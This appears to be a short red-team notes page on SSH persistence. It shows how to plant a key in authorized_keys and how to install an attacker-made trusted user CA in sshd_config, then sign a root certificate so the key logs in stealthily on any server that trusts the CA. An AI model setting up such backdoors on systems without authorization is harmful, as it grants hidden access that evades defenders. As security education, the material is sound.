Secondary Categories: 02-Persistence
Authorized Keys
When configuring SSH by default it allows a remote user to connect using a username and password, but what if that user changes their password? We can utilize SSH authorized keys file and place our SSH key on the ~/.ssh/authorized_keys
file of the user to authenticate as that user.
Trusted User CA Keys
What if we want to be a little more stealth? Defenders will automatically check the au~/.ssh/authorized_keys
file for anything suspicious⦠We can get around this by using a trusted user CA key to sign all our keys and sign in as any user.
# Create a key pair. This command will output two file the public key and private key
ssh-keygen -C CA -f ca
Next we need to configure the server with the newly created CA in the /etc/ssh/sshd_config
Copy the ca.pub and place it in /etc/ssh/ca.pub
.
Edit the /etc/ssh/sshd_config
to add the TrustedUserCAKeys /etc/ssh/ca.pub
Restart the SSH server
Then we need to generate a key for a user
ssh-keygen -t ecdsa
Now we need to sign the user key
# This command will sign our user key and output a file called id_ecdsa-cert.pub
ssh-keygen -s ca -I ap3x -n root -z 1 id_ecdsa.pub
# We can inspect the certiifcate using the following command
ssh-keygen -Lf id_ecdsa-cert.pub
Now we can SSH into any server that trust our CA key
Resources:
Also Check Out:
- PLACEHOLDER